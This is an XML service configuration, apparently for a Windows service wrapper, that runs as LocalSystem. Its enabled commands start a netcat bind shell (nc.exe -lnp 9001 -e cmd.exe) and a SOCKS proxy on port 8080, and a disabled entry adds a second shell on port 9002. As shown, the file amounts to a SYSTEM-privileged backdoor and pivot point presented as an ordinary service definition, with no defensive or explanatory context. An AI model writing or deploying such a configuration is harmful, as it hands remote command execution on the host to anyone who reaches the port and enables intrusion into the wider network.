<?xml version="1.0" encoding="utf-8"?>
<ServiceConfiguration>
    <Name>CustomName</Name>
    <Description>CustomDescription</Description>
    <RunAs>LocalSystem</RunAs>
    <Logging>
        <ServiceLogName>CustomLogName</ServiceLogName>
        <ServiceLogSource>CustomLogSource</ServiceLogSource>
    </Logging>
    <Commands>
        <Command enabled="true">
            <Executable>cmd.exe</Executable>
            <Arguments>/c C:\nc.exe -lnp 9001 -e cmd.exe</Arguments>
        </Command>
        <Command enabled="false">
            <Executable>cmd.exe</Executable>
            <Arguments>/c C:\nc.exe -lnp 9002 -e cmd.exe</Arguments>
        </Command>
        <Command enabled="true">
            <Executable>cmd.exe</Executable>
            <Arguments>/c C:\socksproxy.exe 8080</Arguments>
        </Command>
    </Commands>
</ServiceConfiguration>